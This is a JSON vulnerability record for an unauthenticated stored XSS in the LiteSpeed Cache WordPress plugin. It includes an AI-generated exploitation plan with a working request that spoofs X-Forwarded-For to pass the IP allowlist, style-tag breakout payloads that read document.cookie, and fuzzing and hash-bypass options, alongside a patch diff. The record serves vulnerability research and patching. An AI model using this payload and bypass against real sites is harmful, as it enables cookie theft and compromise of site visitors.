[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f5EG4kpBnTSoqgaX6-zmjp2q--iBQYMELRgUDbrk4TDA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-3375","litespeed-cache-unauthenticated-stored-cross-site-scripting-via-quiccloud-ccssucss-rest-api-endpoints","LiteSpeed Cache \u003C= 7.7 - Unauthenticated Stored Cross-Site Scripting via QUIC.cloud CCSS\u002FUCSS REST API Endpoints","The LiteSpeed Cache plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u002Fwp-json\u002Flitespeed\u002Fv1\u002Fnotify_ccss and \u002Fwp-json\u002Flitespeed\u002Fv1\u002Fnotify_ucss REST API endpoints in all versions up to, and including, 7.7. These endpoints accept CSS content from QUIC.cloud callback notifications and store it to disk without sanitization. The stored content is later rendered inline frontend page loads without output escaping. The access control protecting these endpoints is IP-based validation that can potentially be bypassed when the WordPress site is deployed behind a reverse proxy, load balancer, or CDN with certain configurations. This makes it possible for unauthenticated attackers, under certain conditions, to inject arbitrary JavaScript into CCSS\u002FUCSS content.","litespeed-cache",null,"\u003C=7.7","7.8","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-26 00:00:00","2026-05-27 07:45:55",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F40fa29f5-525a-4986-91f9-0210a7594e46?source=api-prod",1,[22,23,24,25,26,27,28,29],"assets\u002Fjs\u002Fguest.js","assets\u002Fjs\u002Fguest.min.js","autoload.php","data\u002Fconst.default.json","data\u002Fconst.network_default.json","lib\u002Fguest.cls.php","litespeed-cache.php","readme.txt","researched",false,3,"# Exploitation Research Plan: CVE-2026-3375 (LiteSpeed Cache \u003C= 7.7)\n\n## 1. Vulnerability Summary\nThe LiteSpeed Cache plugin (up to version 7.7) contains a Stored Cross-Site Scripting (XSS) vulnerability within its REST API callback endpoints used for Critical CSS (CCSS) and Unique CSS (UCSS) generation. These services (provided by QUIC.cloud) notify the plugin when a CSS generation task is complete. The plugin accepts the generated CSS content via these endpoints and stores it on the filesystem. However, it fails to sanitize this content before storage or escape it during frontend rendering. While the endpoints are protected by an IP-based allowlist, this check can be bypassed in environments where the WordPress site is behind a reverse proxy or CDN that trusts client-provided IP headers (like `X-Forwarded-For`).\n\n## 2. Attack Vector Analysis\n- **Endpoints:** \n    - `\u002Fwp-json\u002Flitespeed\u002Fv1\u002Fnotify_ccss`\n    - `\u002Fwp-json\u002Flitespeed\u002Fv1\u002Fnotify_ucss`\n- **Method:** `POST`\n- **Authentication:** Unauthenticated (relies on IP validation).\n- **Vulnerable Parameter:** The request body (likely JSON) contains the CSS content. Based on QUIC.cloud callback specifications, the parameter is likely `css` or sent as a raw body.\n- **Preconditions:**\n    1. The \"CCSS\" or \"UCSS\" feature must be enabled in **LiteSpeed Cache > Page Optimization**.\n    2. The site must be reachable via the REST API.\n    3. The IP validation must be bypassable via headers like `X-Forwarded-For`.\n\n## 3. Code Flow (Inferred from description & `autoload.php`)\n1. **Entry Point:** `src\u002Frest.cls.php` (inferred) registers the REST routes during the `rest_api_init` hook.\n2. **Route Registration:** Two routes are registered: `litespeed\u002Fv1\u002Fnotify_ccss` and `litespeed\u002Fv1\u002Fnotify_ucss`.\n3. **Validation:** The callback function calls an internal method (likely in `src\u002Fcloud.cls.php` or `lib\u002Fguest.cls.php`) to verify if the request originates from a QUIC.cloud IP. \n   - *Vulnerability:* The IP detection logic (similar to `LiteSpeed\\Lib\\Guest::get_ip()`) may prioritize headers like `HTTP_X_FORWARDED_FOR`.\n4. **Processing:** Once \"validated,\" the callback extracts the CSS payload.\n5. **Storage:** The plugin uses `LiteSpeed\\File::save()` (inferred) to write the CSS content to a file in `wp-content\u002Flitespeed\u002Fccss\u002F` or `wp-content\u002Flitespeed\u002Fucss\u002F`.\n6. **Frontend Sink:** When a guest visitor loads a page, `src\u002Fcss.cls.php` (inferred) reads the stored file and outputs the content inside a `\u003Cstyle>` block:\n   ```html\n   \u003Cstyle id=\"litespeed-ccss\">\u002F* UNTRUSTED CONTENT HERE *\u002F\u003C\u002Fstyle>\n   ```\n   If the content contains `\u003C\u002Fstyle>\u003Cscript>alert(1)\u003C\u002Fscript>`, the CSS block is closed, and the script executes.\n\n## 4. Nonce Acquisition Strategy\nThese specific endpoints are designed for server-to-server callbacks (QUIC.cloud to WordPress) and typically **do not require a WordPress REST nonce**. They rely entirely on IP-based authentication.\n\nIf a nonce were required for `\u002Fwp-json\u002Flitespeed\u002Fv1\u002F`, the following strategy would be used:\n1. **Shortcode:** LiteSpeed Cache often enqueues scripts on the frontend if \"Guest Mode\" or \"CSS Optimization\" is active.\n2. **Page Creation:** \n   `wp post create --post_type=page --post_status=publish --post_title=\"LSCache Test\" --post_content='[litespeed_clean_wrapper]'` (Note: LiteSpeed doesn't use many public shortcodes, but it enqueues scripts on the homepage).\n3. **Extraction:**\n   - Use `browser_navigate` to the homepage.\n   - Use `browser_eval` to find the REST nonce:\n     `browser_eval(\"window.litespeed_data?.nonce\")` (Variable names inferred from standard LiteSpeed JS localization patterns).\n\n**For this exploit, we will first attempt the request without a nonce.**\n\n## 5. Exploitation Strategy\n\n### Step 1: Bypass IP Validation\nQUIC.cloud IPs are required to pass the check. Common QUIC.cloud nodes operate in the `162.159.x.x` range or similar. We will spoof the IP using the `X-Forwarded-For` header.\n\n### Step 2: Inject Payload\nWe will send a POST request to the notification endpoint with a payload that breaks out of the `\u003Cstyle>` context.\n\n**Payload:** `\u002F* normal css *\u002F \u003C\u002Fstyle>\u003Cscript>alert(document.domain)\u003C\u002Fscript>\u003Cstyle>`\n\n**Request via `http_request`:**\n```javascript\n{\n  \"url\": \"http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Flitespeed\u002Fv1\u002Fnotify_ccss\",\n  \"method\": \"POST\",\n  \"headers\": {\n    \"Content-Type\": \"application\u002Fjson\",\n    \"X-Forwarded-For\": \"162.159.25.1\" \u002F\u002F A known QUIC.cloud IP (inferred)\n  },\n  \"params\": {\n    \"css\": \"body{color:red}\u003C\u002Fstyle>\u003Cscript>alert(document.cookie)\u003C\u002Fscript>\u003Cstyle>\",\n    \"url\": \"http:\u002F\u002Flocalhost:8080\u002F\",\n    \"hash\": \"dummy_hash\" \u002F\u002F The plugin may expect a hash check; we will test if this is enforced\n  }\n}\n```\n\n*Note: If `json` params fail, try `application\u002Fx-www-form-urlencoded`.*\n\n### Step 3: Trigger Execution\nNavigate to the homepage. The injected script should execute because LiteSpeed renders CCSS inline for performance.\n\n## 6. Test Data Setup\n1. **Enable CCSS:**\n   `wp option update litespeed-cache-conf '{\"optm-css_async\":\"1\", \"optm-ccss_con\":\"1\"}' --format=json`\n2. **Ensure Folders Exist:**\n   `mkdir -p \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Flitespeed\u002Fccss\u002F`\n3. **Verify Settings:**\n   `wp litespeed-option get optm-css_async`\n\n## 7. Expected Results\n- The `notify_ccss` endpoint returns a `200 OK` or `{\"status\":\"success\"}` response.\n- A new file appears in `wp-content\u002Flitespeed\u002Fccss\u002F` containing the XSS payload.\n- Upon visiting the homepage, the HTML source contains:\n  `\u003Cstyle id=\"litespeed-ccss\">body{color:red}\u003C\u002Fstyle>\u003Cscript>alert(document.cookie)\u003C\u002Fscript>\u003Cstyle>\u003C\u002Fstyle>`\n\n## 8. Verification Steps\n1. **Check Filesystem:**\n   `find \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Flitespeed\u002Fccss\u002F -type f -exec grep \"alert\" {} +`\n2. **Check Frontend Response:**\n   Use `http_request` (GET) on the homepage and grep for the script tag:\n   `response.body.includes('\u003Cscript>alert(document.cookie)\u003C\u002Fscript>')`\n\n## 9. Alternative Approaches\n- **Header Variation:** If `X-Forwarded-For` is ignored, try `X-Real-IP`, `CF-Connecting-IP`, or `True-Client-IP`.\n- **Endpoint Variation:** If `notify_ccss` is patched or hardened, attempt the same payload via `notify_ucss`.\n- **Parameter Fuzzing:** If `css` is not the correct parameter name, try `content`, `data`, or sending the payload as a raw POST body.\n- **Bypass Hash:** If the plugin requires a `hash` parameter that is a MD5 of the API key, check if the API key (`cdn-quic_key` in `data\u002Fconst.default.json`) is empty\u002Fdefault, or if the hash check can be skipped by omitting it.","The LiteSpeed Cache plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the \u002Fwp-json\u002Flitespeed\u002Fv1\u002Fnotify_ccss and \u002Fwp-json\u002Flitespeed\u002Fv1\u002Fnotify_ucss REST API endpoints. Unauthenticated attackers can bypass IP-based access controls using spoofed headers to inject malicious payloads into CSS files that are later rendered inline on the frontend without sanitization.","\u002F\u002F Within LiteSpeed Cache \u003C= 7.7, notification callbacks for CCSS\u002FUCSS generation\n\u002F\u002F lacked sanitization for the 'css' parameter before it was stored on the filesystem.\n\n\u002F\u002F File: src\u002Fbase.cls.php (Inferred location based on version 7.8 refactoring)\n\u002F\u002F The CSS content was saved directly to the cache folder without filtering HTML tags:\n$css = apply_filters( 'litespeed_' . $type, $css, $queue_k );\n$this->cls('File')->save( $file_path, $css );","--- src\u002Fbase.cls.php\n+++ src\u002Fbase.cls.php\n@@ -1074,6 +1074,8 @@\n \tprotected function _save_css_con( $type, $css, $url_tag, $vary, $queue_k, $is_mobile, $is_webp ) {\n \t\t$css = apply_filters( 'litespeed_' . $type, $css, $queue_k );\n \t\t\u002F\u002F Font optimize\n \t\t$css = $this->cls('Optimizer')->optm_font_face( $css );\n+\t\t\u002F\u002F Sanitize: CSS must not contain HTML tags\n+\t\t$css = wp_strip_all_tags( $css );","The attack involves sending a POST request to the `\u002Fwp-json\u002Flitespeed\u002Fv1\u002Fnotify_ccss` or `\u002Fwp-json\u002Flitespeed\u002Fv1\u002Fnotify_ucss` endpoints with an XSS payload (e.g., `\u003C\u002Fstyle>\u003Cscript>alert(1)\u003C\u002Fscript>`) in the CSS data. To bypass IP-based validation, the attacker includes an `X-Forwarded-For` header spoofing a trusted QUIC.cloud IP address. If the server environment trusts this header, the plugin saves the payload into a CSS file on disk. The payload is then rendered directly within an inline `\u003Cstyle>` block on the site's frontend, closing the style tag and executing the injected script in the browser of visiting users.","gemini-3-flash-preview","2026-06-04 20:21:05","2026-06-04 20:21:53",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","7.7","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flitespeed-cache\u002Ftags\u002F7.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flitespeed-cache.7.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flitespeed-cache\u002Ftags\u002F7.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flitespeed-cache.7.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flitespeed-cache\u002Ftags"]